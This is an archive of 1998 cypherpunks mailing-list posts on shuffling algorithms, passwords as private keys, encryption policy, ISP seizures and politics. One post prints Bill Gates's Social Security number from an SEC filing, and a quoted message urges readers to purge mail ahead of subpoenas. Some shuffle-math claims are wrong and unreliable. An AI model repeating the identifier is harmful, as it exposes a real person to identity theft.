Organization: Scientific-Atlanta
MIME-Version: 1.0
Subject: Re: Interesting Articles...  Micro jet engine for Wearable power?
To: "wear-hard@haven.org" <wear-hard@haven.org>
From: Pete Hardie <pete.hardie@sciatl.com>
Sender: phardie@sciatl.com
Resent-From: wear-hard@haven.org
X-Mailing-List: <wear-hard@haven.org> archive/latest/5435
X-Loop: wear-hard@haven.org
Precedence: list
Resent-Sender: wear-hard-request@haven.org

Mark Willis wrote:
> single spool turbojet
> 12mm OD x 3mm long (Tiny!) Weighs 1 gram...
> Rotor speed: 2.4 million rpm
> Combustor temp: 1600deg K
> Output: 13 grams thrust, or 16W electrical
> Fuel: Hydrogen @ 7 grams/hr.
>
>   Fuel for 2-3 hours would fit in a CO2 cylinder sized container or so
> <G>  They use air bearings, and a *silicon* spool, no nickel metal
> sintered exotics here...  This little puppy will run a wearable nicely
> when it gets to production!  (The original is for a small surveillance
> aircraft, 16W power budget isn't bad though!)  I imagine it puts out
> some heat, of course...

But that annoying roar and jet of flame.....

--
Pete Hardie                   |   Goalie, DVSG Dart Team
Scientific Atlanta            |
Digital Video Services Group  |

--
Subcription/unsubscription/info requests: send e-mail with subject of
"subscribe", "unsubscribe", or "info" to wear-hard-request@haven.org
Wear-Hard Mailing List Archive (searchable): http://wearables.ml.org

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 30 Oct 1998 17:27:53 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Random array (fwd)
Message-ID: <199810291908.NAA20468@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 29 Oct 1998 17:33:29 +0100
> From: Anonymous <nobody@replay.com>
> Subject: Re: Random array

> A couple responders have said there is no SWAP_TIMES
> which would work. But I don't understand why the
> following wouldn't work:
> 
> First of all, make sure that x and y can't be equal, since
> there's no point in swapping an element with itself. This
> should add a negligible amount of time.
> 
> 	x=getrand();
> 	do
> 		y=getrand();
> 	while (x == y);
> 
> Now, simply calculate how many SWAP_TIMES it would take for it
> to be equally as likely that an element would not be touched as
> it would to land in its original spot.
> 
> (255/256)^(t*2) = 1/256
> 
> or
> 
> t = ln(1/256)/(2*ln(255/256))
> 
> or
> 
> 708.3955
> 
> 
> Another anonymous wrote:
> 
> In the following snippet of pseudo-code, what should the value of               
> SWAP_TIMES be to make the array A[] random, assuming                            
> that getrand() returned a truly random integer between                          
> 0 and 255                                                                       
>                                                                                 
> A[256];                                                                         
>                                                                                 
> for(i=0;i<SWAP_TIMES;i++){                                                      
>         x=getrand();                                                            
>         y=getrand();                                                            
>         swap(A[x],A[y]);                                                        
> }                                                                               
>                                                                                 
> Thanks
> 

Actualy the optimal value is even easier to calculate.

Given an initial array, A(m), and the desire to randomly swap the contents
until there is sufficient entropy to pass the various statistical tests
leaves us with:

Given m initial element and we are swapping them two at a time then we
need to execute at most m/2 swaps to randomize the array.

So, the optimal SWAP_TIMES ends up being, in this case, 128.

This of course doesn't touch on the new rule above about testing for x=y.
In which case you could simply do it over again. Now given that there are
m elements and the odds of selecting any given one is 1/n and the odds of
selecting it twice at one time is 1/n^2.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RedRook <redrook@yahoo.com>
Date: Fri, 30 Oct 1998 17:17:59 +0800
To: bill.stewart@pobox.com
Subject: Re: don't use passwords as private keys (was Re: Using a password as a private key.)
Message-ID: <19981029221752.26488.rocketmail@send102.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



You don't know you have to destroy a key file, until it is too late.
Until then, it's just laying around waiting for some one to copy and
crack. If you are paranoid enough to assume your opponent is going to
torcher you to get your signature password, you should assume that he
already has your keyfile, and is willing to torcher you to get it's
password.

Thus coercion and dicitonary attacks are moot points. That is, if your
password is good enough.

So, what's worse; guarding a high entopy password with a low entropy
password, or trying to memorize a high entropy password?

Harv


Adam Back <aba@dcs.ex.ac.uk> wrote:
>
> 
> Some people have been talking about using passwords as private keys.
> (By using the passphrase as seed material for regenerating the private
> and public key).
> 
> I don't think this is a good idea.
> 
> You can't forget passphrases.  You can destroy private key files.
> 
> Therefore you open yourself up to coercion, and forward secrecy is not
> possbile with these schemes.  This means it is less secure.
> 
> The other reason it is less secure others commented on: you provide an
> open target for dictionary attacks.  I wouldn't want to do that, even
> with high entropy passphrase, it loses one important line of defense:
> unavailability of private key file.
> 
> Adam
> 
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 30 Oct 1998 17:06:35 +0800
To: "Brown, R Ken" <mmotyka@lsil.com>
Subject: RE: UK police chase crooks on CCTV (fwd)
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F853E@MSX11002>
Message-ID: <4.0.2.19981029092518.03f5bdf0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 05:41 AM 10/29/98 -0600, Brown, R Ken wrote:
>> So when are they going to arrest Gorby and Fidel?  They killed more
>people.
>
>Castro I assume the moment he steps foot in the USA other than on a
>diplomatic mission. I've no idea about   Gorbachev, I assume as a KGB
>official he was party to the same sort of behaviour as Pinochet was, but
>when he got to the top at least he didn't make things worse. Anyway,
>what about Oliver North?  And since when did our inability to catch all
>criminals stop us prosecuting the ones  we can catch?

Castro was in Spain on the same day Spain tried to extradite Pinochet.
Pinochet is accused of murdering 4K people.  Castro murdered many more than
4K people.  Gorby had a couple of massacres during his regime.  One in the
Baltics and as I recall one in Georgia.  I'm sure collectively he killed
more than 4K of people.  He no longer has diplomatic immunity either.  My
point is not that we shouldn't grab them it's that the "Human Rights
Community" is politically discriminatory and wouldn't think of going after
commies.

How about Mandella.  The Truth and Reconcilliation Commission report says
that the ANC was guilty of plenty of human rights violations.

>The very fact
>that some people who once had political credibility,  like Thatcher or
>Bush, support Pinochet is exactly the reason why he should be tried. We
>need to draw a line between tolerable and intolerable government and put
>his lot on the other side of it.

The very fact that some people who once had political credibility, like FDR
or Henry Wallace, support Joe Stalin is exactly the reasom why he should be
tried.  We need to draw the line...

And how about all those American commies whose cancelled paychecks from
Moscow we recently recovered from the KGB files.  

And what about the Butcher of Waco?

>You have to know what the threats to liberty are. Old Soviet-style
>"Communism" is hardly on the menu in any European  or North American
>country these days and out-and-out looney Naziism isn't either 

Be careful with this argument because Pinochet could propose a necessity
defense.  If you say communism is worse, then he can say he had to do it to
prevent communism.  

Also, "human rights violation" is a vague charge.  There are students in
the UK who are mad at Red Tony for the human rights violation of starting
to charge college tuition and depriving them of a free college education.

American tax cutters are regularly accused of the "human rights violation"
of letting people keep more of their own money.

It can hardly be illegal for governments to kill their own citizens.  They
do it all the time.  The US governments kill hundreds or thousands every
year depending on how you do the math.  

Better to use straight criminal law (or revolution) and inevitably let some
heads of state escape justice than to indulge in the ex post facto
political law represented by "crimes against humanity."

DCF

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Thu, 29 Oct 1998 23:03:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Crypt Wars, UK-Style
Message-ID: <199810291416.PAA15950@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <199810290400.UAA14769@netcom13.netcom.com> some1 wrote:

:    CRYPT WARS, UK-STYLE

:      UK's Privacy International has awarded the Department of Trade and
: Industry a Big Brother award for its contribution to invading privacy. The
: DTI wants all companies offering encrypted services to be licensed, which
: means using a third party holding keys to the user's encryption code.
: Encryption licensed outside the UK will not be recognised, and thus would
: not be protected by law. And only the recommendation of senior police is
: needed to get a key - users aren't allowed to know if their key has been
: given to the police. More Big Brother awards at http://www.privacy.org/pi/  

Hmm would like to see on which EC directive/law they base this exclusion
of 'foreign' (ie EC) TTP's.

--
Alex de Joode | International CryptoRunners | http://www.replay.com
         'A little paranoia can lengthen your life'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Fri, 30 Oct 1998 01:00:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Shuffling (fwd)
In-Reply-To: <199810291325.HAA19001@einstein.ssz.com>
Message-ID: <71a4d9$vsm$1@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



In article <199810291325.HAA19001@einstein.ssz.com>,
Jim Choate  <ravage@einstein.ssz.com> wrote:
>Forwarded message:
>
>> Date: Wed, 28 Oct 1998 22:10:08 -0800
>> From: Alex Alten <Alten@home.com>
>> Subject: Re: Shuffling
>
>> The concept of swapping to get a random string of bits is very interesting.
>> >From what I understand when one shuffles a deck of 52 cards 7 or more times
>> the card order becomes unpredictable e.g. random.
>
>Only if it is a 'fair' shuffle. There are poker players I've met who could
>put a given card anywhere in the deck after 4-5 shuffles.
>
>>  The shuffle must be
>> what is called a "near perfect" shuffle.
>
>Perfect for who? Idealy the 'perfect' shuffle (if I understand your meaning
>of perfect) would be for each card in each deck-half to interleave 1-to-1.
>This does not produce random anything, it does make it very hard for people
>to count cards, which is why you shuffle - not to create a necessarily
>random ordering of the cards, just so mis-ordered nobody can remember what
>the sequence was and predict reliably what the sequence will be. This is
>incredibly important in games like poker or rummie where the cards pile up
>and players can see the sequence (and if they can remember it use it).

The "7 times" theorem uses the following model of a shuffle:

o The deck is cut into two parts, with the number of cards in each piece
    binomially distributed (with mean 26, of course).
o The resulting deck is then achieved by having cards fall from one or the
    other of the two parts; a card will fall from one of the parts with
    probability proportional to the number of cards remaining in the part.

   - Ian "Who took a course in Randomized Algorithms last year"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Fri, 30 Oct 1998 09:52:31 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <149dd87864f91b7efecc26d6611b4a49@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Can someone do a fill in/summary/recapitulation? I'm not sure I understand all of this and the MIB stuff...


-----Original Message-----
From: Anonymous <nobody@replay.com>
To: cypherpunks@toad.com <cypherpunks@toad.com>
Date: Tuesday, October 27, 1998 8:45 PM


:[Two letters received by fax on 27 October 1998]
:
:----------
:
:[Letter 1, cover and 16 pages]
:
:8 September 1998
:
:Cover Sheet
:
:Declan
:
:The Good News is that I have a pen to write
:with, due to the Free Enterprise System being
:alive & well within the Prison System.
:
:The Bad News is that Micro$oft Pens (TM)
:controls 95% of the market...
:
:I am hoping you can share as much of this
:communique as possible with the CPUNX,
:since my chain is constantly getting yanked
:in different directions, making outside contact
:sporatic & unreliable.
:
:Feel free to reserve for your own use any
:of the enclosed information you need for your
:own journalistic purposes.
:
:I will try to reach you by phone (automated
:collect-call system requiring touch-tone on
:your end).
:
:Thanks for the Mags,
:
:                     CJ Parker
:
:ps# My prison cell mirror now reads,
:"Chocolate Skelter." (Brownie & Milk)
:
:------------------------------------------------
:
:[FLORENCE NUTLY NEWS - "I'M HERE BECAUSE I
:believe that the KONTROLLERS are taking
:actions that create obstacles to the freedom
:and openess of the Internet. ~Truth Glaser]
:
:Declan,
:
:Looks like you may be receiving the *only* copy
:of the Florence Nutly News, since I have, up
:until now, been writing on paper towels and
:medicine cups, using combinations of blood,
:sperm and chocolate (two of which are in short
:supply) for ink, and I will soon be headed
:to Nutly News Head (pardon the pun) Quarters
:in Springfield, Missouri, for Rewiring of
:my Brain Circuity.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chip Mefford <cmefford@video.avwashington.com>
Date: Fri, 30 Oct 1998 17:06:48 +0800
To: cypherpunks@toad.com
Subject: Re: 4 Horseman not so bad..
In-Reply-To: <199810292139.WAA21195@replay.com>
Message-ID: <Pine.LNX.3.95.981029170343.14245D-100000@video.avwashington.com>
MIME-Version: 1.0
Content-Type: text/plain





On Thu, 29 Oct 1998, Anonymous wrote:

> At 07:52 AM 10/29/98 -0500, Chip Mefford wrote:
> >>  but some peope are scared of
> >> drugs/paedophiles/terrorists etc, so thats the way in for the jackboots. 
> >> To oppose it we need to reduce fear. 
> >
> >Thats the most interesting POV I've ever heard
> >of in these discussions, seems like for the most part, 
> >we counter fear arguments with other fear arguments,
> >Never saw this before. Bears more examination.
> 
> 
> Right.  The new Happy Net campaign.
> 
> Druggies.. why, they're friendly enough to
> be elected officials in such peaks of civilization as D.C. and L.A.
> And the more successful recreational pharmaceutical merchants 
> are luxury-car and mobile telecomm early adopters!
> 
> Pedophiles.  Well, consider that Kennedy and his babysitter..
> You'd still vote for him, right? 
> 
> Terrorists.  Well, shoot, everyone needs to express themselves
> some times.  One day you're a terrorist, the next you're boosting
> the POTUS's ratings a few points with a handshake.  
> 


Well, 

Sorry, I don't mean to sound pollyanneish, thats not my point.
Its just a point of view I had never heard expressed before, and
I thought it was interesting. 

Fighting fear with more fear isn't working. 
Its just that simple, a different approach 
I think is worthy of investigation. 

thats all

> 
> 
> 
> 
> 
> 
> 
>   
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Igor Chudov @ home" <ichudov@Algebra.COM>
Date: Fri, 30 Oct 1998 08:25:14 +0800
To: cypherpunks@Algebra.COM
Subject: test
Message-ID: <199810292351.RAA25980@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text/plain



test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Fri, 30 Oct 1998 08:42:36 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Shuffling (fwd)
Message-ID: <199810300024.SAA21942@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 29 Oct 1998 19:22:52 +0100
> From: Anonymous <nobody@replay.com>
> Subject: Re: Shuffling

> For any N greater than two, the random-swap algorithm cannot produce
> a perfectly smooth randomization of A[N].

If by 'perfectly smooth randomization of A[N]' you mean that any two
members of A[N] have equaly likelyhood to be swapped, and hence any pattern
of A[N] members being possible with equal odds then this is incorrect.

For that arrangement to be relevant your (P)RNG function must choose any
element from 0 to N with equal odds, it's probability curve must be a
horizontal line at 1/n for each N. If it ain't you aren't going to randomly
shuffle the elements of A[] since each element doesn't have the same odds of
being selected in this (or every other) turn.

> A perfect randomization of A[N] would give equal probability to each of
> the N! (N factorial) possible rearrangements of A.

Ah, but there aren't N! rearrangements of A if we are limited to only
swapping two elements. There are at best n^2.

Allow me to explain...

> Each iteration of the random-swap algorithm makes two choices of the N
> values to swap.  There are N^2 possible ways these two choices could go.

Ok, we shoot off our first random number, 1/n. We then shoot off our second
random number, also 1/n. The combination is 1/n * 1/n or 1/n^2. Now if we
add the stipulation about the i'th and i+1'st numbers not being identical
then the odds are 1/n * 1/n-1 (note that this boundary condition is
artificial and may in fact be problematic, there is no logical reason to
keep i and i+1 from being the same n if we want truly random behaviour).

> To calculate the probabilities after an iteration, we try all the N^2
> choices and count how many instances of each arrangement are produced.

Huh? What probability are we calculating here, the odds of getting the
particular pattern we have now generated? If so that is either 1/n^2 or
1/n(n-1) depending on the boundary condition.

> This gives each possible arrangement a probability in the form of
> k/N^2, where k of the N^2 choices led to that arrangement.

What arrangement, the one we start with before or after the swap? If we
start with arrangement I and then swap two elements we get I+1. There are
only two ways to get to any particular arrangment. An identical arrangement
where we swap i with itself (ignoring the potential boundary condition)
and the arrangement where the l'th and j'th elements are swapped. As long as
we're only swapping two elements there can only be two possible parent
patterns for any given resultant pattern. Now if we swap more than 2
elements it gets big fast.

I seem to be reading an implication that given a particular pattern, I, there
is some rhyme or reason to the pattern of previous I's that got us here,
there isn't. For any given pattern there is a infinite number of potential
paths that would get to any particular.

Let's say we have:

[ 0  1  2  4  3 ]

and we shuffle and get,

[ 0  4  2  1  3 ]

or,

[ 0  1  2  4  3 ]

Now if the question is how many possible ways could be have gotten to the
original, [ 0  1  2  4  3 ], then there are two ways to calculate that,

given no stipulation on reptitions we get:

n^2

given a stipulation for no repetitions we get:

(n)(n-1)

We can generalize this somewhat if we let s represent our current sequence
and our goal is to determine the number of possible previous states the
sequence could have held.

s-1 = n^2

or,

s-1 = n(n-1)

Now if we want to calculate the number of possible parent generations for
s-1 *from the perspective of s0* we get:

s-2 = (s-1)^2 = (n^2)^2

or,

s-2 = (s-1)((s-1)-1) = (n^2)((n^2)-1)

Thus,

s-3 = (s-2)^2 = ((s-1)^2)^2 = ((n^2)^2)^2

or,

s-3 = (s-2)((s-2)-1) = ( (n^2)((n^2)-1) )( ((n^2)((n^2)-1) )-1) =

(n^4 - n^2)( (n^4 - n^2) - 1)

for the second form only,

s-4 = (s-3)((s-3)-1) = ((n^4-n^2)((n^4-n^2)-1))(((n^4-n^2)((n^4-n^2)-1))-1)

    = ((n^4-n^2)^2 - (n^4-n^2)) (n^4-n^2)^2-(n^4-n^2))-1)

(I'm going to stop here trying to resolve this equation, I don't have the
time. Note that the relation is i(i-1) for each generation so we only
need to affix a relation to i and the generation number. It's worth noting
this can be resolved recursively.)

These can be generalized for the first form to:

C(s-i) = n^(2^i), where i is the number of generations going back.

The inverse makes a handy measure of entropy as well as telling you the odds
of selecting any particular path from one pattern to another pattern given
the number of elements swaps that are allowed.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 30 Oct 1998 17:21:50 +0800
To: bill.stewart@pobox.com
Subject: don't use passwords as private keys (was Re: Using a password as a private key.)
In-Reply-To: <3.0.5.32.19981028012129.008334d0@idiom.com>
Message-ID: <199810292120.VAA01702@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Some people have been talking about using passwords as private keys.
(By using the passphrase as seed material for regenerating the private
and public key).

I don't think this is a good idea.

You can't forget passphrases.  You can destroy private key files.

Therefore you open yourself up to coercion, and forward secrecy is not
possbile with these schemes.  This means it is less secure.

The other reason it is less secure others commented on: you provide an
open target for dictionary attacks.  I wouldn't want to do that, even
with high entropy passphrase, it loses one important line of defense:
unavailability of private key file.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 30 Oct 1998 17:06:59 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: No Subject
Message-ID: <199810292107.WAA18137@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


excuse this bandwidth.

me
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>

iQA/AwUBNjiEBHUkEFXvH2ZAEQJ11wCdEEcGeWaOWjrNZ2e22a0Q5WtRMtIAmwQH
JkSiA2UUrB6pahgHqA0dvIYc
=8qn4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Dobrucki <jdo@hyperreal.art.pl>
Date: Fri, 30 Oct 1998 17:02:12 +0800
To: cypherpunks@cyberpass.net
Subject: Super computer SR2201 at PJWSTK
Message-ID: <3638DF42.6B7618BB@hyperreal.art.pl>
MIME-Version: 1.0
Content-Type: text/plain



I got news for you all. I'm applying for an account on a super
computer which we got in our school. I need to write the reason why I
need to have such an account. The reason why I want to put is: to
break a DES-56 bit key encrypted message. I don't know if my
applications for the account will be accepted, but if you got any
ideas now as to how you'd like to use the computational power of a
super computer, just let me know...

http://www.pjwstk.waw.pl/sr2201/index.html this is the address to the
page at my school about the SR2201, but it's in polish... i might
translate it one day soon...
Looking foreward to your comments and ideas.
JD

PS. My return address is somewhat messed up.
Just send mail to either the list, or to
s1180@qmail.pjwstk.waw.pl
for some reason, the server at my school, PJWSTK,
says that your domain is not accepted. For 
some reason, it says so for all domains.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 30 Oct 1998 17:02:34 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: MIB Subpoenas
Message-ID: <199810292136.WAA20955@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:23 PM 10/28/98 -0800, Tim May wrote:
>The first thing I did when I heard about the latest case, that of Toto, was
>to purge any private mail messages between myself and Toto or any of his
>alleged nyms. (My backups  may have old messages, but I've been trying to
>find them all and destroy or recopy them sans the Toto messages.)
>
>I advise any of you with links to the idea of anonymous murders and AP to
>do the same. Soon.

Tim,
	Betty Currie will be by to pick up the rest of the backup tapes...









  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Fri, 30 Oct 1998 12:56:46 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Random array (fwd)
Message-ID: <199810300436.WAA23127@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 29 Oct 1998 20:04:57 -0800
> From: Jim Gillogly <jim@acm.org>
> Subject: Re: Random array

> One could modify Greg's suggestion slightly by attaching an auxiliary
> array of 256 random numbers to each of the members of the original
> array and then using the most efficient handy sort algorithm to sort
> those random numbers, dragging along their associated original array
> elements.  This way it doesn't have a chance to interfere with the
> operation of the sorting algorithm, at the cost of an extra array.

So you've got a set of arrays that have 256 numbers in them, whether they
are random or not is irrelevant since we're going to sort them and break
their randomness. It is merely sufficient that they all be reasonably (what
the hell ever that's going to mean) different, if they're all 6's for
example it isn't going to be very interesting.

If I understand the process. Each array would cycle through in parallel
sorting 2 elements of each array. Once that was finished we'd then sort the
arrays themselves according to some process. From your description it seems
to imply that you're going to sort the 1st element descending at that point.
This in effect mis-orders each array after every sort.

This sort of system is an IFS and could lead to determinism (ie a cycle of
sort patterns that repeat endlessly) or chaos (ie a pattern that doesn't
repeat). It in and of itself doesn't guarantee any randomness merely a
continously munged sort.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 30 Oct 1998 17:11:49 +0800
To: cypherpunks@toad.com
Subject: 4 Horseman not so bad..
Message-ID: <199810292139.WAA21195@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:52 AM 10/29/98 -0500, Chip Mefford wrote:
>>  but some peope are scared of
>> drugs/paedophiles/terrorists etc, so thats the way in for the jackboots. 
>> To oppose it we need to reduce fear. 
>
>Thats the most interesting POV I've ever heard
>of in these discussions, seems like for the most part, 
>we counter fear arguments with other fear arguments,
>Never saw this before. Bears more examination.


Right.  The new Happy Net campaign.

Druggies.. why, they're friendly enough to
be elected officials in such peaks of civilization as D.C. and L.A.
And the more successful recreational pharmaceutical merchants 
are luxury-car and mobile telecomm early adopters!

Pedophiles.  Well, consider that Kennedy and his babysitter..
You'd still vote for him, right? 

Terrorists.  Well, shoot, everyone needs to express themselves
some times.  One day you're a terrorist, the next you're boosting
the POTUS's ratings a few points with a handshake.  








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 30 Oct 1998 13:03:00 +0800
To: cypherpunks@cyberpass.net
Subject: Jim Gilmore
Message-ID: <199810300425.XAA19931@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



> from ppoole@fcref.org  CfCL Weekly Update 10/30/98

***** 
Companies Create New Crypto Back Door 

Hewlett-Packard and Wave Systems announced Tuesday that they have
developed a new programmable chip that can be adjusted to match
prevailing encryption policies. This system will only allow a computer
to encrypt data to the maximum level that local regulations allow. The
new program, called EMBASSY, must be registered with a "designated local
authority", who will activate the cryptography application.

The companies behind EMBASSY are hoping that the program will meet the 
new Department of Commerce encryption export standards, which currently
place a 56-bit limit on exported software applications. While 90 percent
of countries have no domestic-use policies, the program allows law
enforcement agencies that mandate key recovery features, such as France,
to be able to obtain access to a user's encrypted files under certain
circumstances. Several countries, including the UK, Germany, France, 
Denmark, Japan and Australia have already approved the technology. The
US will not issue export license until they are certain that the
recovery elements have been tested.

Privacy advocates were critical of EMBASSY. Jim Gilmore, co-founder of
the Electronic Frontier Foundation, expressed concern that the
cooperation of Hewlett-Packard and Wave Systems with the government may
lead to more surreptitious features being included into the program.
"What other black boxes have they put in this chip? Keystroke
monitoring? Recording traffic across the bus?" asked Gilmore. "If
they're giving you a black box, who's to say what other capabilities are
actually in that chip?"

Read this related WIRED News article:
http://www.wired.com/news/news/technology/story/15848.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 30 Oct 1998 14:09:33 +0800
To: cypherpunks@cyberpass.net
Subject: William H. Gates III
Message-ID: <199810300528.AAA20342@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Leading digits "539"...what state was he born in?
---guy

======================================================================
SCAN THIS NEWS
10/29/98

The following information is posted on the U.S. Securities and Exchange
Commission's (SEC) "EDGAR" database located at:

http://www.sec.gov/edaux/formlynx.htm

In the "Enter a company" box, search on -

     "MICROSOFT CORP"

You'll find the following file -

      Date Filed    Forms    CIK Code     Company Name

     "02-07-1996   SC 13G/A   789019     MICROSOFT CORP"

Click on this link and you'll find the following information -

MAIL ADDRESS:
      STREET 1:               ONE MICROSOFT WAY - BLDG 8
      STREET 2:               NORTH OFFICE 2211
      CITY:                   REDMOND
      STATE:                  WA
      ZIP:                    98052-6399

FILED BY:

      NAME OF REPORTING PERSON

        S.S. or I.R.S. Identification No. of Above Person

        William H. Gates III      Social Security #: 539-60-5125


                       SECURITIES AND EXCHANGE COMMISSION
                             Washington, D.C. 20549
                                  SCHEDULE 13G
                    Under the Securities Exchange Act of 1934
                               (Amendment No. 7)*
                              MICROSOFT CORPORATION

======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 1 Nov 1998 10:41:58 +0800
To: Pallas Anonymous Remailer <athena@cyberpass.net>
Subject: Re: Orwell
In-Reply-To: <e13486ebc447582125bd572fae7fccfd@anonymous>
Message-ID: <Pine.BSF.3.91.981030004858.22809A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




How does one sieze an ISP?

A couple of machines used to forward UseNet traffic were impounded with 
the cooperation of the service providors. Get your shit straight.

On Fri, 30 Oct 1998, Pallas Anonymous Remailer wrote:

> Some US ISP's were seized in a cyberporn bust.
> 
> Dreamscape's statement at:
> 
> http://www.dreamscape.com/dream98/statement.htm
> 
> Buffnet's at:
> 
> http://www.buffnet.com/ag/
> 
> Vacco's at:
> 
> http://www.oag.state.ny.us/press/oct98/oct28_98.html
> 
> All three worth reading. This could be a big story. The theory against
> the ISPs (not that they've been charged with a crime) is that they
> knowingly carried the newsgroups:
> 
> alt.binaries.pictures.erotica.pre-teen
> alt.binaries.pictures.erotica.early-teen
> 
> This has broader application -- alt.binaries.warez.*,
> alt.binaries.sounds.mp3, etc.
> 
> Is any ISP which carries suspect newsgroups at risk of having 
> its equiptment seized, and who draws up the blacklist of 
> newsgroups?
> 
> Or worse, is there no public blacklist at all -- just the
> hovering fear of an up-for-reelection AG swooping down. And when
> do naughty pictures start showing up in alt.fan.disney? And
> what's the AG's move then?
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 30 Oct 1998 17:48:00 +0800
To: cypherpunks@cyberpass.net
Subject: IP: FCC Proposes Location Tracking for Wireless Phones
Message-ID: <199810300903.BAA19560@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Ari Schwartz <ari@cdt.org>
Subject: IP: FCC Proposes Location Tracking for Wireless Phones
Date: Wed, 28 Oct 1998 11:12:21 -0500 (EST)
To: policy-posts@cdt.org


   The Center for Democracy and Technology  /____/     Volume 4, Number 27
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 4, Number 27                   October 28, 1998

 CONTENTS:
(1) FCC Proposes Location Tracking for Wireless Phones
(2) Public Comment Sought - CDT Launches Citizen Action Site
(3) FCC Opens Inquiry into Wiretapping in Packet Networks
(4) Other Surveillance Features
(5) Subscription Information
(6) About CDT

  ** This document may be redistributed freely with this banner intact **
        Excerpts may be re-posted with permission of <ari@cdt.org>


_____________________________________________________________________________

